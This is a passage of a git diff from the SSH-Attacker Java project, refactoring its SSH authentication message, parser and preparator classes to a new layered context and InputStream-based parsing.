5cc009595..fa9dd6b7e 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoResponseMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoResponseMessage.java @@ -9,10 +9,14 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.AuthenticationResponse; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthInfoResponseMessageHandler; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthInfoResponseMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthInfoResponseMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthInfoResponseMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; -import de.rub.nds.sshattacker.core.state.SshContext; +import java.io.InputStream; public class UserAuthInfoResponseMessage extends SshMessage { @@ -43,6 +47,37 @@ public void setResponse(AuthenticationResponse response) { @Override public UserAuthInfoResponseMessageHandler getHandler(SshContext context) { - return new UserAuthInfoResponseMessageHandler(context, this); + return new UserAuthInfoResponseMessageHandler(context); + } + + @Override + public UserAuthInfoResponseMessageParser getParser(SshContext context, InputStream stream) { + return new UserAuthInfoResponseMessageParser(stream); + } + + /* + @Override + public UserAuthInfoResponseMessageParser getParser(byte[] array) { + return new UserAuthInfoResponseMessageParser(array); + } + + @Override + public UserAuthInfoResponseMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthInfoResponseMessageParser(array, startPosition); + }*/ + + @Override + public UserAuthInfoResponseMessagePreparator getPreparator(SshContext context) { + return new UserAuthInfoResponseMessagePreparator(context.getChooser(), this); + } + + @Override + public UserAuthInfoResponseMessageSerializer getSerializer(SshContext context) { + return new UserAuthInfoResponseMessageSerializer(this); + } + + @Override + public String toShortString() { + return "AUTH_INFO_RESPONSE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthKeyboardInteractiveMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthKeyboardInteractiveMessage.java index 63e9b28e6..d5546f610 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthKeyboardInteractiveMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthKeyboardInteractiveMessage.java @@ -10,8 +10,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthKeyboardInteractiveMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthKeyboardInteractiveMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthKeyboardInteractiveMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthKeyboardInteractiveMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class UserAuthKeyboardInteractiveMessage @@ -104,6 +108,36 @@ public void setSubMethods(String subMethods, boolean adjustLengthField) { @Override public UserAuthKeyboardInteractiveMessageHandler getHandler(SshContext context) { - return new UserAuthKeyboardInteractiveMessageHandler(context, this); + return new UserAuthKeyboardInteractiveMessageHandler(context); + } + + @Override + public UserAuthKeyboardInteractiveMessageParser getParser( + SshContext context, InputStream stream) { + return new UserAuthKeyboardInteractiveMessageParser(stream); + } + /*@Override + public UserAuthKeyboardInteractiveMessageParser getParser(byte[] array) { + return new UserAuthKeyboardInteractiveMessageParser(array); + } + + @Override + public UserAuthKeyboardInteractiveMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthKeyboardInteractiveMessageParser(array, startPosition); + }*/ + + @Override + public UserAuthKeyboardInteractiveMessagePreparator getPreparator(SshContext context) { + return new UserAuthKeyboardInteractiveMessagePreparator(context.getChooser(), this); + } + + @Override + public UserAuthKeyboardInteractiveMessageSerializer getSerializer(SshContext context) { + return new UserAuthKeyboardInteractiveMessageSerializer(this); + } + + @Override + public String toShortString() { + return "AUTH_KEYBOARD"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthNoneMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthNoneMessage.java index 37143171d..182e2ce5b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthNoneMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthNoneMessage.java @@ -7,13 +7,49 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthNoneMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthNoneMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthNoneMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthNoneMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import java.io.InputStream; public class UserAuthNoneMessage extends UserAuthRequestMessage { @Override public UserAuthNoneMessageHandler getHandler(SshContext context) { - return new UserAuthNoneMessageHandler(context, this); + return new UserAuthNoneMessageHandler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new UserAuthNoneMessageParser(stream); + } + + /* + @Override + public SshMessageParser getParser(byte[] array) { + return new UserAuthNoneMessageParser(array); + } + + @Override + public SshMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthNoneMessageParser(array, startPosition); + }*/ + + @Override + public UserAuthNoneMessagePreparator getPreparator(SshContext context) { + return new UserAuthNoneMessagePreparator(context.getChooser(), this); + } + + @Override + public UserAuthNoneMessageSerializer getSerializer(SshContext context) { + return new UserAuthNoneMessageSerializer(this); + } + + @Override + public String toShortString() { + return "AUTH_NONE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java index e4dce8076..6ec955460 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java @@ -11,9 +11,14 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthPasswordMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthPasswordMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthPasswordMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthPasswordMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class UserAuthPasswordMessage extends UserAuthRequestMessage { @@ -123,6 +128,38 @@ public void setNewPassword(String newPassword, boolean adjustLengthField) { @Override public UserAuthPasswordMessageHandler getHandler(SshContext context) { - return new UserAuthPasswordMessageHandler(context, this); + return new UserAuthPasswordMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new UserAuthPasswordMessageParser(stream); + } + + /* + @Override + public SshMessageParser getParser(byte[] array) { + return new UserAuthPasswordMessageParser(array); + } + + @Override + public SshMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthPasswordMessageParser(array, startPosition); + } + */ + @Override + public UserAuthPasswordMessagePreparator getPreparator(SshContext context) { + return new UserAuthPasswordMessagePreparator(context.getChooser(), this); + } + + @Override + public UserAuthPasswordMessageSerializer getSerializer(SshContext context) { + return new UserAuthPasswordMessageSerializer(this); + } + + @Override + public String toShortString() { + return "AUTH_PW"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java index 2e125fbcf..768b99504 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java @@ -10,9 +10,14 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.exceptions.NotImplementedException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthPkOkMessageHandler; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthPkOkMessageParser; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class UserAuthPkOkMessage extends SshMessage { @@ -98,6 +103,35 @@ public void setPubkey(String pubkey) { @Override public UserAuthPkOkMessageHandler getHandler(SshContext context) { - return new UserAuthPkOkMessageHandler(context, this); + return new UserAuthPkOkMessageHandler(context); + } + + @Override + public UserAuthPkOkMessageParser getParser(SshContext context, InputStream stream) { + return new UserAuthPkOkMessageParser(stream); + } + /*@Override + public UserAuthPkOkMessageParser getParser(byte[] array) { + return new UserAuthPkOkMessageParser(array); + } + + @Override + public UserAuthPkOkMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthPkOkMessageParser(array, startPosition); + }*/ + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + throw new NotImplementedException("UserAuthPkOkMessageHandler::getPreparator"); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + throw new NotImplementedException("UserAuthPkOkMessageHandler::getSerializer"); + } + + @Override + public String toShortString() { + return "AUTH_OK"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java index 7ca5bda7d..31fcf6457 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java @@ -12,9 +12,13 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthPubkeyMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthPubkeyMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthPubkeyMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthPubkeyMessageSerializer; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class UserAuthPubkeyMessage extends UserAuthRequestMessage { @@ -155,6 +159,36 @@ public ModifiableByteArray getSignature() { @Override public UserAuthPubkeyMessageHandler getHandler(SshContext context) { - return new UserAuthPubkeyMessageHandler(context, this); + return new UserAuthPubkeyMessageHandler(context); + } + + @Override + public UserAuthPubkeyMessageParser getParser(SshContext context, InputStream stream) { + return new UserAuthPubkeyMessageParser(stream); + } + + /*@Override + public UserAuthPubkeyMessageParser getParser(byte[] array) { + return new UserAuthPubkeyMessageParser(array); + } + + @Override + public UserAuthPubkeyMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthPubkeyMessageParser(array, startPosition); + }*/ + + @Override + public UserAuthPubkeyMessagePreparator getPreparator(SshContext context) { + return new UserAuthPubkeyMessagePreparator(context.getChooser(), this); + } + + @Override + public UserAuthPubkeyMessageSerializer getSerializer(SshContext context) { + return new UserAuthPubkeyMessageSerializer(this); + } + + @Override + public String toShortString() { + return "USERAUTHPUBKEY"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthSuccessMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthSuccessMessage.java index 9f3ba0390..3955ec3a5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthSuccessMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthSuccessMessage.java @@ -7,14 +7,48 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthSuccessMessageHandler; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthSuccessMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthSuccessMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthSuccessMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; -import de.rub.nds.sshattacker.core.state.SshContext; +import java.io.InputStream; public class UserAuthSuccessMessage extends SshMessage { @Override public UserAuthSuccessMessageHandler getHandler(SshContext context) { - return new UserAuthSuccessMessageHandler(context, this); + return new UserAuthSuccessMessageHandler(context); + } + + @Override + public UserAuthSuccessMessageParser getParser(SshContext context, InputStream stream) { + return new UserAuthSuccessMessageParser(stream); + } + + /*@Override + public UserAuthSuccessMessageParser getParser(byte[] array) { + return new UserAuthSuccessMessageParser(array); + } + + @Override + public UserAuthSuccessMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthSuccessMessageParser(array, startPosition); + }*/ + + @Override + public UserAuthSuccessMessagePreparator getPreparator(SshContext context) { + return new UserAuthSuccessMessagePreparator(context.getChooser(), this); + } + + @Override + public UserAuthSuccessMessageSerializer getSerializer(SshContext context) { + return new UserAuthSuccessMessageSerializer(this); + } + + @Override + public String toShortString() { + return "USERAUTH_SUCCESS"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthUnknownMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthUnknownMessage.java index cca42a33b..0441d3959 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthUnknownMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthUnknownMessage.java @@ -9,8 +9,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthUnknownMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthUnknownMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthUnknownMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthUnknownMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import java.io.InputStream; public class UserAuthUnknownMessage extends UserAuthRequestMessage { private ModifiableByteArray methodSpecificFields; @@ -31,6 +36,37 @@ public void setMethodSpecificFields(byte[] methodSpecificFields) { @Override public UserAuthUnknownMessageHandler getHandler(SshContext context) { - return new UserAuthUnknownMessageHandler(context, this); + return new UserAuthUnknownMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new UserAuthUnknownMessageParser(stream); + } + + /*@Override + public SshMessageParser getParser(byte[] array) { + return new UserAuthUnknownMessageParser(array); + } + + @Override + public SshMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthUnknownMessageParser(array, startPosition); + }*/ + + @Override + public UserAuthUnknownMessagePreparator getPreparator(SshContext context) { + return new UserAuthUnknownMessagePreparator(context.getChooser(), this); + } + + @Override + public UserAuthUnknownMessageSerializer getSerializer(SshContext context) { + return new UserAuthUnknownMessageSerializer(this); + } + + @Override + public String toShortString() { + return "USERAUTH_Unnkown"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java index d299bb2c1..9e3e5fda4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java @@ -10,16 +10,37 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthBannerMessage; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import java.io.InputStream; import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public class UserAuthBannerMessageParser extends SshMessageParser { - public UserAuthBannerMessageParser(byte[] array) { + private static final Logger LOGGER = LogManager.getLogger(); + + /* public UserAuthBannerMessageParser(byte[] array) { super(array); } public UserAuthBannerMessageParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + + public UserAuthBannerMessageParser(InputStream stream) { + super(stream); + } + + @Override + public void parse(UserAuthBannerMessage message) { + LOGGER.debug("Parsing UserAuthBannerMessage"); + parseData(message); + message.setCompleteResultingMessage(getAlreadyParsed()); + } + + private void parseData(UserAuthBannerMessage msg) { + msg.setData(parseByteArrayField(getBytesLeft())); + LOGGER.debug("Data: {}", msg.getData().getValue()); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java index 381f232ba..a28f1b26d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java @@ -10,16 +10,26 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthFailureMessage; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import java.io.InputStream; import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public class UserAuthFailureMessageParser extends SshMessageParser { - public UserAuthFailureMessageParser(byte[] array) { - super(array); - } + private static final Logger LOGGER = LogManager.getLogger(); + + /* + public UserAuthFailureMessageParser(byte[] array) { + super(array); + } + public UserAuthFailureMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ - public UserAuthFailureMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public UserAuthFailureMessageParser(InputStream stream) { + super(stream); } @Override @@ -27,6 +37,13 @@ public UserAuthFailureMessage createMessage() { return new UserAuthFailureMessage(); } + @Override + public void parse(UserAuthFailureMessage message) { + LOGGER.debug("Parsing UserAuthBannerMessage"); + parseMessageSpecificContents(); + message.setCompleteResultingMessage(getAlreadyParsed()); + } + private void parsePossibleAuthenticationMethods() { message.setPossibleAuthenticationMethodsLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java index a6601acda..900d273ef 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java @@ -13,6 +13,7 @@ import de.rub.nds.sshattacker.core.constants.BinaryPacketConstants; import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthHostbasedMessage; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -22,12 +23,17 @@ public class UserAuthHostbasedMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public UserAuthHostbasedMessageParser(byte[] array) { - super(array); - } + /* + public UserAuthHostbasedMessageParser(byte[] array) { + super(array); + } + public UserAuthHostbasedMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ - public UserAuthHostbasedMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public UserAuthHostbasedMessageParser(InputStream stream) { + super(stream); } @Override @@ -35,6 +41,13 @@ protected UserAuthHostbasedMessage createMessage() { return new UserAuthHostbasedMessage(); } + @Override + public void parse(UserAuthHostbasedMessage message) { + LOGGER.debug("Parsing UserAuthBannerMessage"); + parseMessageSpecificContents(); + message.setCompleteResultingMessage(getAlreadyParsed()); + } + private void parsePubKeyAlgorithm() { message.setPubKeyAlgorithmLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java index b38eef671..e2ded505d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java @@ -14,6 +14,7 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthInfoRequestMessage; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -21,12 +22,18 @@ public class UserAuthInfoRequestMessageParser extends SshMessageParser { - public UserAuthSuccessMessageParser(byte[] array) { - super(array); - } + private static final Logger LOGGER = LogManager.getLogger(); + + /* + public UserAuthSuccessMessageParser(byte[] array) { + super(array); + } + public UserAuthSuccessMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ - public UserAuthSuccessMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public UserAuthSuccessMessageParser(InputStream stream) { + super(stream); } @Override @@ -25,6 +35,13 @@ public UserAuthSuccessMessage createMessage() { return new UserAuthSuccessMessage(); } + @Override + public void parse(UserAuthSuccessMessage message) { + LOGGER.debug("Parsing UserAuthBannerMessage"); + parseMessageSpecificContents(); + message.setCompleteResultingMessage(getAlreadyParsed()); + } + @Override protected void parseMessageSpecificContents() {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java index 9a8b7c869..9ae778a6b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthUnknownMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -16,13 +17,18 @@ public class UserAuthUnknownMessageParser extends UserAuthRequestMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - - public UserAuthUnknownMessageParser(byte[] array) { - super(array); - } - - public UserAuthUnknownMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + /* + + public UserAuthUnknownMessageParser(byte[] array) { + super(array); + } + public UserAuthUnknownMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public UserAuthUnknownMessageParser(InputStream stream) { + super(stream); } @Override @@ -38,6 +44,13 @@ private void parseMethodSpecificFields() { message.getMethodSpecificFields().getValue())); } + @Override + public void parse(UserAuthUnknownMessage message) { + LOGGER.debug("Parsing UserAuthBannerMessage"); + parseMessageSpecificContents(); + message.setCompleteResultingMessage(getAlreadyParsed()); + } + @Override protected void parseMessageSpecificContents() { super.parseMessageSpecificContents(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/UserAuthHostbasedMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/UserAuthHostbasedMessagePreparator.java index d49efb8d4..54d2e86a4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/UserAuthHostbasedMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/UserAuthHostbasedMessagePreparator.java @@ -51,7 +51,7 @@ public void prepareUserAuthRequestSpecificContents() { public byte[] prepareSignatureInput() { return ArrayConverter.concatenate( Converter.bytesToLengthPrefixedBinaryString( - chooser.getContext().getSessionID().orElse(new byte[] {})), + chooser.getContext().getSshContext().getSessionID().orElse(new byte[] {})), new byte[] {getObject().getMessageId().getValue()}, Converter.stringToLengthPrefixedBinaryString(getObject().getUserName().getValue()), Converter.stringToLengthPrefixedBinaryString( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/UserAuthPubkeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/UserAuthPubkeyMessagePreparator.java index dda53c77a..3adede6b4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/UserAuthPubkeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/UserAuthPubkeyMessagePreparator.java @@ -53,9 +53,14 @@ private byte[] getSignatureBlob( ByteArrayOutputStream signatureOutput = new ByteArrayOutputStream(); signatureOutput.write( ArrayConverter.intToBytes( - chooser.getContext().getSessionID().orElse(new byte[0]).length, + chooser.getContext() + .getSshContext() + .getSessionID() + .orElse(new byte[0]) + .length, DataFormatConstants.STRING_SIZE_LENGTH)); - signatureOutput.write(chooser.getContext().getSessionID().orElse(new byte[0])); + signatureOutput.write( + chooser.getContext().getSshContext().getSessionID().orElse(new byte[0])); signatureOutput.write(getObject().getMessageId().getValue()); signatureOutput.write( ArrayConverter.intToBytes( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java index d0c02e1fc..c5299ba9f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java @@ -11,7 +11,8 @@ import de.rub.nds.modifiablevariable.ModifiableVariableProperty; import de.rub.nds.modifiablevariable.bool.ModifiableBoolean; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.Message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import jakarta.xml.bind.annotation.XmlAccessType; import jakarta.xml.bind.annotation.XmlAccessorType; import jakarta.xml.bind.annotation.XmlTransient; @@ -20,8 +21,8 @@ import java.util.Random; @XmlAccessorType(XmlAccessType.FIELD) -public abstract class ProtocolMessage> - extends ModifiableVariableHolder { +public abstract class ProtocolMessage> + extends Message { /** content type */ @XmlTransient protected final boolean GOING_TO_BE_SENT_DEFAULT = true; @@ -114,7 +115,20 @@ public void setAdjustContext(Boolean adjustContext) { ModifiableVariableFactory.safelySetValue(this.adjustContext, adjustContext); } - public abstract ProtocolMessageHandler getHandler(SshContext context); + @Override + public abstract ProtocolMessageHandler getHandler(SshContext sshContext); + + // @Override + // public abstract ProtocolMessageParser getParser(byte[] array); + + // @Override + // public abstract ProtocolMessageParser getParser(byte[] array, int startPosition); + + @Override + public abstract ProtocolMessagePreparator getPreparator(SshContext sshContext); + + @Override + public abstract ProtocolMessageSerializer getSerializer(SshContext sshContext); public abstract String toCompactString(); } diff --git 